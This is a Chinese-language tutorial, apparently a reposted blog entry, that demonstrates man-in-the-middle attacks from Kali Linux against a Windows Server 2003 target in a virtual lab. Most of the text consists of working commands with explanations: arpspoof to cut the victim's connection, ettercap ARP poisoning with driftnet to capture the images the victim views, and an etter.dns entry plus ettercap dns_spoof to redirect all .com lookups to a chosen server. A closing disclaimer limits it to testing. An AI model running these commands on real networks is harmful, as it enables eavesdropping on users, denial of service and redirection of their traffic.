kali攻击命令大全_中间人攻击之ARP欺骗

我不会RAP,但我会ARP——老欢

环境:

  1. 攻击机:kali linux (ip地址:192.168.204.128)
  2. 靶机:windows server 2003(IP地址:192.168.204.132)

以上均是虚拟机环境,网络模式为NAT模式

检验虚拟机之间的网络是否连通

kali攻击命令大全_中间人攻击之ARP欺骗_第1张图片

ARP断网攻击

在终端输入命令:arpspoof -i eth0 -t 192.168.204.132 192.168.204.2

命令解释:

-i 指定网卡

-t 指定目标ip

这里的192.168.204.2是网关

kali攻击命令大全_中间人攻击之ARP欺骗_第2张图片

欺骗开始,我们来看看靶机,靶机已经无法上网,无法访问百度了。

kali攻击命令大全_中间人攻击之ARP欺骗_第3张图片

接下来我们按ctrl+c停止arp欺骗,靶机又能上网了

kali攻击命令大全_中间人攻击之ARP欺骗_第4张图片

2.捕获靶机浏览的图片

在终端输入命令:ettercap -i eth0 -Tq -M arp:remote /192.168.204.132// /192.168.204.2//

eth0是网卡

192.168.204.132是靶机地址

192.168.204.2是网关地址

kali攻击命令大全_中间人攻击之ARP欺骗_第5张图片

开启图片嗅探 driftnet -i eth0 -a -d /root/pictures
这里将嗅探到的图片存到root目录下的pictures文件夹里

接下来我们在靶机上面随便浏览一些图片,然后我们打开kali机的pictures文件夹,所有的图片已经被抓取到,所以少看不该看的图片!

kali攻击命令大全_中间人攻击之ARP欺骗_第6张图片

3.DNS欺骗

首先执行命令leafpad /etc/ettercap/etter.dns

在这个文件里加上这么一句 *.*.com A 39.108.146.75(这里的ip地址是403工作室的ip)

kali攻击命令大全_中间人攻击之ARP欺骗_第7张图片

执行命令 ettercap -i eth0 -Tq -P dns_spoof /192.168.204.132// /192.168.204.2//

kali攻击命令大全_中间人攻击之ARP欺骗_第8张图片

回到靶机,在url上输人http://www.163.com来访问一下网易

f003f252d9a09e7fcd1ce9eb9462c188.png

当我回车访问那一刻,它跳转到了403工作室

kali攻击命令大全_中间人攻击之ARP欺骗_第9张图片

经过试验,这里的dns欺骗对一些大型网站不起作用,可能是做了防dns欺骗的措施

本文仅供测试娱乐,请勿用于实际环境。

中间人攻击之ARP欺骗 - 403工作室​laohuan.art
kali攻击命令大全_中间人攻击之ARP欺骗_第10张图片

你可能感兴趣的:(kali攻击命令大全)